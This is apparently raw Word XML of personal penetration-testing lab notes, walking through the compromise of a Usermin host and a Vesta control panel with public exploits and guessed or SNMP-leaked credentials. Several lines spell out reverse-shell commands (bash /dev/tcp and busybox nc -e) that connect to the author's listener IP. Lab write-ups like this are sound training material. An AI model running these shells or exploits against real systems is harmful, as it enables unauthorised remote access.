    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000393B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1098"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Could have also added the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -e nsr</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for quicker find</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000393C">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This one was for FTP. The users.txt was Cassie, cassie, Mark, mark, Robert, and robert</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000393D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1098"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is important since we saw Cassie on the exiftool but the username was actually cassie (lowercase)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000393E">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And then re try credentials on website since cassie:cassie gave you local.txt so it's likely her actual account password so it will likely work on website</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000393F">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And it worked for both FTP and the usermin portal!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003940">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In FTP was local.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003941">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Further enumerating usermin page, we see that we have 2 ways of getting rev shell!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003942">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First, we can use the usermin 1.820 exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003943">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1098"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1249">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/50234</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003944">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10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searchsploit -m 50234</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003945">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Then, you inspect the code and see that you need to edit the lines to add your own IP and port</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003946">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1098"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">listen_ip = "192.168.45.197"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003947">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1098"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">listen_port = 443</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003948">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Start listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003949">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10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rlwrap nc -lvnp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000394A">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I then ran it but I got an error</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000394B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10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50234.py -u 192.168.239.157 -l cassie -p cassie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000394C">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The error was:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> IndexError: list index out of range</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000394D">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It turns out, we were supposed to use the hostname and not the IP. This makes sense, since even though we added it to /etc/hosts, we should always use the hostname</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000394E">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So I ran it again, and it worked!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000394F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1098"/>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50234.py -u XXXXXXXXX -l cassie -p cassie</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003950">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1098"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another way to get RCE was using the command execution that was included in usermin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003951">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="109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2489200" cy="3987800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="220" name="image209.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image209.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1250"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="24892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3952">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Go to "Login" and then "Command Shell"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003953">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1098"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1879600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="268" name="image264.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image264.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1251"/>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3954">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You can then type in any command you want</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003955">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I tried connecting using nc only, but it didn't work</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003956">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Then I tried the Bash 5 shell and it worked!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003957">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1098"/>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-i 5&lt;&gt; /dev/tcp/192.168.45.197/4444 0&lt;&amp;5 1&gt;&amp;5 2&gt;&amp;5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003958">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1098"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I also tried seeing if busybox was installed, and it was, so I used busybox nc and it worked!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003959">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1098"/>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busybox nc 192.168.45.197 4444 -e sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000395A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000395B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000395C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9npadngqzmek" w:id="535"/>
      <w:bookmarkEnd w:id="535"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vesta </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000395D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000395E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXXXXXXXX-C .156 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">which got us</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> root shell </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and skipped initial foothold! We just had to use credentials for Vesta.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Port 8083.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000395F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003960">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First, we got valid credentials through SNMP, which were </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">jack:3PUKsX98BMupBiCf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and we could login to Vesta. Vesta portal was on</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003961">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003962">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On </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">port 8083</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, there was a portal. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It was a Vesta port. I tried the credentials and it worked</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003963">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jack : 3PUKsX98BMupBiCf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003964">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Then, I tried looking around, but nothing useful.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003965">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So then I searched up "Vesta exploits github" on google and found this</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003966">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1427"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1252">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/CSpanias/vesta-rce-exploit</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003967">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I then tried it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003968">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vesta.py</w:t>
      </w:r>
      <w:hyperlink r:id="rId1253">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="fa0000"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId1254">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://192.168.239.156:8083</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> jack 3PUKsX98BMupBiCf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003969">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1427"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">make sure it's https and not http</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000396A">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And I got a shell!</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> And it was root!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000396B">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BUTTTTT, it was a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">per‑command executor (a.k.a per-command wrapper),</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> meaning that none of the previous commands affect the future. Like if you try "cd ..", then it won't actually change your directory. You always go back to where you start.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000396C">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Each line you type is run in its own fresh process that starts in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/local/vesta/web/api/v1/edit/mail.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000396D">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Builtins like cd only affect that one short‑lived process, so your cwd "snaps back" on the next line.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000396E">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Absolute paths (e.g., /home/jack/local.txt, /root/proof.txt) still work, so you can read any file you have permission for.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000396F">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I tried uprgrading the shell using VIM and python, but nothing worked! But, I finally found out how to get a shell. Just send a rev shell to another listener!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003970">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You can use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bash -i</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> from revshells.com. Bash5 from revshells.com also works</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003971">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="142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-i &gt;&amp; /dev/tcp/192.168.45.197/4444 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003972">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="142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/bin/bash -i 5&lt;&gt; /dev/tcp/192.168.45.197/4444 0&lt;&amp;5 1&gt;&amp;5 2&gt;&amp;5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003973">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or you can use busybox if it's there (which it was for me)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003974">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="142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busybox nc 192.168.45.197 4444 -e /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003975">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1427"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
